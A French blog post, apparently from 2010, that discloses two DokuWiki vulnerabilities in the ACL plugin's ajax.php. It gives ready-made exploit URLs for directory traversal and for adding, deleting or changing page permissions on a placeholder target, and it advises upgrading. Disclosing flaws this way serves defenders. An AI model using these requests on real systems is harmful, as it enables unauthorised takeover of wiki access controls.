Dokuwiki exploit : change or delete permissions


Dokuwiki
Dokuwiki est l'un des logiciels de wikis en php le plus utilisé aujourd'hui. Deux failles de sécurité viennent d'être découvertes pour les versions inférieures à la 2009-12-25. La plus grave d'entre elles permet à un utilisateur malveillant de rajouter, supprimer ou modifier les droits d'accès à l'ensemble des pages.

Dokuwiki exploit

La première faille permet, tout simplement, d'obtenir la liste des répertoires créés dans le wiki. Après test, il n'est visiblement pas possible de lister le nom des fichiers ou d'y accéder, ce qui limite énormément son champ d'action.

Voici un exemple d'utilisation :


http://cible.fr/lib/plugins/acl/ajax.php?ajax=tree&ns=../pages/

La seconde faille, la plus grave à mon avis, touche le plugin de gestion des droits (ACL). Voici un exemple d'utilisation si l'on souhaite en ajouter :


http://cible.fr/lib/plugins/acl/ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[save]=1&acl=(ACL)

Pour en supprimer :


http://cible.fr/lib/plugins/acl/ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[del]=1&acl=(ACL)

Enfin, pour modifier des droits existants :


http://cible.fr/lib/plugins/acl/ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[update]=1&acl=(ACL)

Attention, pour chacun des cas ci-dessus, il faudra remplacer "(ACL)" par l'action souhaitée :

  • read
  • modified
  • creation
  • upload
  • delete

La seule solution pour corriger ce problème est de mettre à jour votre version de Dokuwiki.


5 Commentaires pour "Dokuwiki exploit : change or delete permissions"

Flux des commentaires de cet article Ajouter un commentaire
  •  

    Merci pour l'info.

    RépondreRépondre
    Kasi , le 18 janvier 2010 à 11:57
  •  

    Oui merci pour l'info, mais tu l'as trouvé ou ?

    RépondreRépondre
    GanGan , le 20 janvier 2010 à 12:11
  •  

    @GanGan : l'exploit a été publié à plusieurs endroits. On pourra prendre l'exemple de Packet Storm.

    RépondreRépondre
    pti-seb , le 20 janvier 2010 à 23:49
  •  

    ok merci !

    RépondreRépondre
    GanGan , le 21 janvier 2010 à 13:00
  •  

    com dap les développeur oublient toujours les else et contrôle chaque page de gestion d 1 site par 1 session

    RépondreRépondre
    k3vin mitnick , le 21 février 2010 à 01:41
 

Ajouter un commentaire

actualité android apache apple astuce astuces bash bilboblog blog boot chrome clavier commande commandes conky date debian Desktop développement elementary exploit faille fedora firefox flash gimp gnome google graphique Graphisme hack hacking Hardware humour intel internet iphone jailbreak Jeux Kde kernel libre Linux log logiciels Logiciels Libres lucid lynx maemo mail maquette metasploit microsoft mobile mockup monitoring mozilla multi-touch musique mysql n900 nautilus nokia noyau openoffice open source password photos php Planet publicité red hat redhat rpm réseau screenshot script serveur serveurs shell sql ssh statistiques sysadmin system Sécurité thème tux-planet tv twitter ubuntu unity vidéo vidéos vlc voyage wallpaper windows wordpress yum